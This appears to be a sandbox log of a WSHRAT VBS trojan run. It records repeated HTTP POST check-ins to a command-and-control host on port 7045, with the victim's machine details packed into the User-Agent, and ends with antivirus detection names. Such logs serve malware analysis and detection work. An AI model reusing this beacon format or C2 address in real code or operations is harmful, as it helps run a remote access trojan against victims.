buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional N |plus|nan-av|false - 2023-09-03|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1076
sent: 323
1 323 0

send

buffer: !
socket: 992
sent: 1
1 1 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 992
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional N |plus|nan-av|false - 2023-09-03|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1108
sent: 323
1 323 0

send

buffer: !
socket: 992
sent: 1
1 1 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 992
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional N |plus|nan-av|false - 2023-09-03|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1116
sent: 323
1 323 0

send

buffer: !
socket: 992
sent: 1
1 1 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 992
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional N |plus|nan-av|false - 2023-09-03|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1112
sent: 323
1 323 0

send

buffer: !
socket: 992
sent: 1
1 1 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 992
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional N |plus|nan-av|false - 2023-09-03|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1100
sent: 323
1 323 0

send

buffer: !
socket: 992
sent: 1
1 1 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 992
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional N |plus|nan-av|false - 2023-09-03|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1100
sent: 323
1 323 0

send

buffer: !
socket: 992
sent: 1
1 1 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 992
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional N |plus|nan-av|false - 2023-09-03|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1112
sent: 323
1 323 0

send

buffer: !
socket: 992
sent: 1
1 1 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 992
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional N |plus|nan-av|false - 2023-09-03|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 380
sent: 323
1 323 0

send

buffer: !
socket: 992
sent: 1
1 1 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 992
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional N |plus|nan-av|false - 2023-09-03|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 376
sent: 323
1 323 0

send

buffer: !
socket: 992
sent: 1
1 1 0

InternetCrackUrlW

url: http://chongmei33.publicvm.com:7045/is-ready
flags: 0
1 1 0

HttpOpenRequestW

connect_handle: 0x00cc0008
http_version:
flags: 71303168
http_method: POST
referer:
path: /is-ready
1 13369356 0

send

buffer: !
socket: 992
sent: 1
1 1 0

send

buffer: POST /is-ready HTTP/1.1 Accept: */* Accept-Language: ko User-Agent: WSHRAT|7C6024AD|TEST22-PC|test22|Microsoft Windows 7 Professional N |plus|nan-av|false - 2023-09-03|Visual Basic Accept-Encoding: gzip, deflate Host: chongmei33.publicvm.com:7045 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
socket: 1112
sent: 323
1 323 0

send

buffer: !
socket: 992
sent: 1
1 1 0
DrWeb VBS.Siggen.8176
Sangfor Malware.Generic-VBS.Save.cefb6a89
Arcabit VB:Trojan.Valyria.D11B9
Cyren VBS/Dunihi.A
Symantec VBS.Heur.SNIC
ESET-NOD32 VBS/Agent.OXW
Avast JS:Skiddo-A [Trj]
Cynet Malicious (score: 99)
Kaspersky Trojan.VBS.Agent.bdq
BitDefender VB:Trojan.Valyria.4537
NANO-Antivirus Trojan.Script.Agent.iwquii
MicroWorld-eScan VB:Trojan.Valyria.4537
Emsisoft VB:Trojan.Valyria.4537 (B)
F-Secure Malware.VBS/Dldr.Agent.VPTL
VIPRE VB:Trojan.Valyria.4537
McAfee-GW-Edition VBS/Agent.dy
FireEye VB:Trojan.Valyria.4537
Sophos VBS/DwnLdr-ACDC
Avira VBS/Dldr.Agent.VPTL
ZoneAlarm Trojan.VBS.Agent.bdq
GData VB:Trojan.Valyria.4537
Google Detected
MAX malware (ai score=81)
Fortinet VBS/Agent.OXW!tr
AVG JS:Skiddo-A [Trj]